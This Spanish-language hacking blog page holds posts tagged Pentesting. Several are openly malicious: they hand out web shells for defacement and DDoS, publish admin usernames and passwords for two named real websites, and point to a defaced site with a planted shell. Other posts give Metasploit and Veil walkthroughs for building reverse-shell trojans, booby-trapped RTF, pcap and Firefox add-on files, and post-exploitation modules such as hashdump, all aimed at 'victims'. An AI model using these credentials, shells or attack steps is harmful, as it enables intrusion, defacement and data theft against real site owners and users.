Mostrando entradas con la etiqueta Pentesting. Mostrar todas las entradas
Mostrando entradas con la etiqueta Pentesting. Mostrar todas las entradas

2 Shell Up


Les dejo dos shell  la c99shell 1.0 y b374 2.8  para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada.







Descargar:



Login Admin Hackeado




Para subir shell no modifiquen nada -_-

Web

Login Admin

http://www.embroidered-printed-clothing.co.uk/login.php

Username: Justin
Password: jlcb599516


http://vecinitas.com.ve/admin/login.php

Usuario: luis
Contraseña: 12345

Thanks 12Glitch13

Shell gratis





Aquí les regalo esta web con shell para que suban sus shell booter o lo que quieran, si quieren pueden defacear xD
Autor:12Glitch13



Deface web con shell

http://www.lacoloniadigital.com.uy/noticias/12Glitch13.php

Web original

http://www.lacoloniadigital.com.uy

vbulletin 4.x - SQLi Exploit Liberado CVE-2014-2022




Fecha: 10/12/2014
CVSS: 7.1 (AV: N / AC: H / Au: S / C: C / I: C / A: C) de base
cwe: 89 


proveedor: Soluciones vBulletin
producto: vBulletin 4
Versiones afectadas: últimas 4.x (hasta la fecha); verificado <= 4.2.2
* VBulletin 4.2.2 (verificado)
* VBulletin 4.2.1 (verificado)
* VBulletin 4.2.0 PL2 (verificado) 


explotabilidad: 

* Explotable de forma remota
* Requiere autenticación (ApiKey)
disponibilidad parche (hasta la fecha): Ninguno 


Resumen

vBulletin 4 no limpiar adecuadamente los parámetros para permitir breadcrumbs_create
a un atacante inyectar comandos SQL de su elección (SELECT).
riesgo: más bien bajo - debido al hecho de que es indispensable la clave api
es probable que pueda utilizar CVE-2014-2023 para obtener la clave api 



Detalles 

componente vulnerable:
./includes/api/4/breadcrumbs_create.php
argumento vulnerables:
conceptid 


que se desinfectan TYPE_STRING lo que no impide inyecciones SQL. 
1) prerequesites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder)

Nota: no se proporciona meterpreter_bind_tcp 
ejecutar PoC, esperar para el éxito! mensaje 
Nota: poc desencadenará shell meterpreter 

escenario PoC meterpreter requiere que el usuario mysql para tener permisos de escritura 
que puede no ser el caso en algunas instalaciones por defecto

Cronología 

01/14/2014: contacto inicial vendedor, ninguna respuesta 
24/02/2014: contactos de proveedores terceros, ninguna respuesta 
10/13/2014: divulgación pública


Exploit:

https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2022/poc_cve-2014-2022.py


Usando No-ip en Veil framework




Lo primero que voy hacer es crear una cuenta de No-Ip para hacer mi ip publica estática no sere muy detallado por que creo que la mayoría  conoce lo que es no-ip y su funcionamiento.

-Registrarse en la pagina de no-ip.
-Damos en agregamos host.
-Colocamos el hostname ,en ip address es nuestra ip publica.
-En ADD host para guardar.
-descargar el DUC de no-ip.
-como estoy virtualizando Kali utilizo el duc en windows 7.




-Ahora abrimos veil y configuramos para que sea python meterpreter reverse tcp ,dependiendo de las versiones de veil el número puede cambiar.






-seguimos con la configuración cuando nos toque colocar nuestra ip en set LHOST colocamos nuestro No-ip por ejemplo RhinestoneBluer.no-ip.org  .Colocando también nuestro puerto a la escucha como en este caso realizare un ataque wan hay que abrir el puerto 4444 en el router.
y por ultimo solo tecleamos generate.






-Lo siguiente es colocar el nombre y utilizamos Pyinstaller



-Ahora nos vamos a metasploit y configuramos el exploit de handler ,utilizamos un payload de reverse_tcp_dns el dns es importante si el no reconocería nuestro dominio en set LHOST cambia en lugar de poner nuestra ip privada hay que colocar nuestro dominio de  no-ip ,el puerto  a la escucha es igual que el veil  y finalmente lanzamos el exploit.





-Listo una session de meterpreter para meterle persistencia al incauto xD....


Post modulos-metasploit






Metasploit tiene una amplia gama de módulos de la explotación después de la que se puede ejecutar en los objetivos comprometidos para reunir pruebas, el pivote más en una red de destino, y mucho más.


Primero hay que tener meterpreter en la maquina comprometida ,yo le subo privilegios como system para evitar errores ,colocamos el comando de background para que nos guarde nuestra sesión de meterpreter y retrocedemos con el comando de back para utilizar los post modulos de metasploit.







voy a usar dos post modulos , uno de ellos lo que hace es trasmitir un video de youtube a todos los sistemas que tengo infectados .se podra ver los videos en el navegador predeterminado y con la ventana maximizada , donde dice VID ponemos el id del video.





msf use post/multi/manage/play_youtube
msf exploit (play_youtube)>set VID 
msf exploit (play_youtube)>set session 1  
msf exploit (play_youtube)>exploit


El segundo nos muestra las aplicaciones que estan instaladas y las vesiones  de la  pc victima .







msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit


Hay otros post modulos que son de gran ayuda como....

use post/windows/gather/checkvm:
verifica si la pc infectada es una maquina virtual o no.


use post/windows/gather/hashdump:
Mostrara la contraseña del administradoor del sistema.

use post/windows/gather/usb_history

Enumera la historia de la unidad USB.

Obtener Shell con Firefox



Este exploit dinámicamente crea un archivo de addon XPI.. El bootstrap addon Firefox resultante se presenta a la víctima a través de una página web.
Navegador Firefox de la víctima se abrirá un cuadro de diálogo preguntando si confían en el addon. Una vez que el usuario hace clic en "install", el complemento se instala y ejecuta la carga útil con permisos de usuario. A partir de Firefox 4, esto va a funcionar sin un reinicio como el addon está marcado para ser "bootstrap". A medida que el complemento se ejecutará la carga útil después de cada reinicio Firefox, una opción puede ser dada a desinstalar automáticamente el complemento una vez que la carga ha sido ejecutado. En Firefox 22,0-27,0, CVE-2014-1510 nos permite saltarnos la primera mitad de los permisos con prontitud.

En este caso se obtendra una shell del sistema pero podemos convertir esa shell

en una sesión de meterpreter con varias tecnicas.







Cita:msf use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload
firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost(IP)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit

Solo hay que enviar el enlace a la victima,se tendra que instalar el addon para firefox.





Esperamos la conexion y ejecutamos el comnado de sessions para comprobar si llego la shell.


Arrancamos la sesión con el numero de id y listo tenemos una shell del sistema infectado con el comando HELP podemos ver todas las opciones que nos permite realizar en el sistema.




Servidor para Metasploit



En esta ocasión Maligno no tiene que ver con Chema Alonso . Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.

Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo. Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...






1.- Instala python-ipcalc (dependencia):

Cita:sudo apt-get update && sudo apt-get install python-ipcalc

2.- Descarga y descomprime Maligno:

Cita:http://www.encripto.no/tools/maligno-1.1.tar.gz

3.- Genera un certificado auto-firmado con el siguiente script:

Cita:./certgen.sh

4.- Configura el servidor Maligno ajustando las opciones en server.conf:

Cita:Echa un vistazo al fichero server.conf.explained

5.- Ejecuta el servidor Maligno:

Cita:python maligno_srv.py

6.- Genera un cliente:

Cita:python clientgen.py -i 0 -f server.conf -o my_client.py

Cita:-i: Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0)
-f: Fichero de configuración del servidor Maligno
-o: Fichero de salida donde se escribirá el código del cliente

7.- Manejador de Metasploit
Arranca msfconsole con el fichero de recursos generado por Maligno

Cita:msfconsole -r reverse_tcp_192.168.0.2_4444.rc

8.- Empieza a conseguir shells!

Autor:VICENTE MOTOS

Veil reverce https y Armitage





Los caballos de diligencia shellcode-less, teatralizadores Meterpreter "puros" en cierto modo similares a los caballos de diligencia reverse_tcp tradicionales. 
Reverse_https Meterpreter [s] teatralizadores son en realidad un poco más simple que reverse_tcp. La idea general es la misma: el controlador sirve un archivo dll. Que el cliente luego inyecta mediante el VirtualAlloc / etc. metodología. Sin embargo, en lugar de tener que parchear el. Dll a nosotros mismos con las instrucciones de montaje y el descriptor de fichero de un conector, el manejador de Metasploit parchea el agente de usuario, método de transporte (http / https), url y expiración / tiempo de espera de la comunicación de forma dinámica, ya que sirve el Meterpreter.





Configuramos los parametros la ip atacante y el puerto de escucha




Colocamos un nombre al troyano y nos preguntara como crear el payload la opcion 1 por defecto




Se guardara el troyano en la siguiente ruta /root/veil-output/compiled/Rhinestone.exe




Creamos la sesion de handler pero esta ves utilizando un payload de reverce https






Cita:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST (IP)
msf exploit(handler) > set LPORT 3232
msf exploit(handler) > exploit -j


Solo hay que pasarle el troyano a la victima y esperar que lo ejecute y tendremos la sesión de meterpreter.





Veil y Armitage



Cortana es un lenguaje de scripting ataque basado en el sueño, ambas escritas por Raphael Mudge. Cortana permite la manipulación avanzada de Armitage , las versiones gratuitas y de pago de un entorno de tipo gui (y más) para Metasploit. (Nota: armitage está disponible gratuitamente en Kali con apt-get install armitage). Con Cortana, puede disparar en eventos específicos o acciones del usuario, interactuar con el backend Metasploit completo, modificar los menús, y mucho más. Hay algunos buenos ejemplos en github de Raffi de lo que usted puede hacer con este potente lenguaje a su alcance. 

Velo-Evasion en Armitage utilizando Cortana. Con el fin de obtener la estructura de menú deseado, Armitage (licencia BSD) código de fondo fue despojado de distancia y menús personalizados se construyeron utilizando ejemplos de código existentes de Raffi. Para cargar el guión veil_evasion.cna en Armitage, vaya a Armitage -> Scripts, seleccione el botón Cargar y navegue hasta el guión veil_evasion.cna:























Aparece una nueva pestaña en la parte superior Veil-Evasion, solo nos queda configurar el troyano pero esta vez con un entorno grafico amigable , mi recomendación es aunque armitage es bastante bueno siempre es mejor aprender manualmente cada funcion, pero para la organización de las pcs infectadas es bueno por su sistema grafico de host.




Bug de Word 2010/2013 (Explotando)







En este módulo se crea un archivo RTF malicioso que al abrirse en versiones vulnerables de Microsoft Word dará lugar a la ejecución de código. Existe la falla en la forma de un campo de recuento lista de invalidación puede ser modificada para tratar una estructura como la otra. Este error se consideró inicialmente la explotación en la partida salvaje en abril de 2014. Este módulo fue creado mediante la inversión de una muestra pública malware.

Microsoft Word 2003 Service Pack 3, 2007 SP3, 2010 SP1 y SP2, 2013, y 2013 RT; Word Viewer; Compatibilidad de Office Paquete SP3; Office 2011 para Mac; Word Automation Services en Server 2010 SP1 y SP2 y 2013 de SharePoint; Office Web Apps 2010 SP1 y SP2; y Office Web Apps Server 2013 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de datos RTF artesanales.

Exploit

Cita:CVE-2014-1761


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86






Cita:use exploit/windows/fileformat/ms14_017_rtf






Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Se crea un archivo (.rtf) malicioso,solo hay que abrirlo en la pc victima.




creamos una conexion de handler para que cuando abramos el archivo (.rtf) se conecte 
a la pc atacante,configuramos nuestros parametros.






Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Abrimos el archivo ,Esperamos que conecte y nos da la sesión de meterpreter.



Bug de wireshark (Explotando)






Este módulo Metasploit provoca un desbordamiento del búfer de pila en las versiones de Wireshark 1.8.12-1.10.5 y por abajo por la generación de un archivo malicioso.

Desbordamiento de búfer en la función mpeg_read en escuchas telefónicas / mpeg.c en el analizador MPEG en Wireshark 1.8.x antes de 1.8.13 y 1.10.x antes 1.10.6 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (caída de aplicación) a través de un gran récord en los datos MPEG.


Exploit

Cita:CVE-2014-2299


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86





Cita:use exploit/windows/fileformat/wireshark_mpeg_overflow





Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set target 1
exploit




Se crea un archivo (.pcap) una captura de paquetes,que causara que el wireshark falle al ejecutar
el archivo ,solo hay que abrirlo en la pc victima.






Pero antes hay que crear una conexion de handler para que cuando abramos el archivo (.pcap) se conecte a la pc atacante,configuramos nuestros parametros.





Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.154.130
exploit


Esperamos que conecte y nos da la sesión de meterpreter.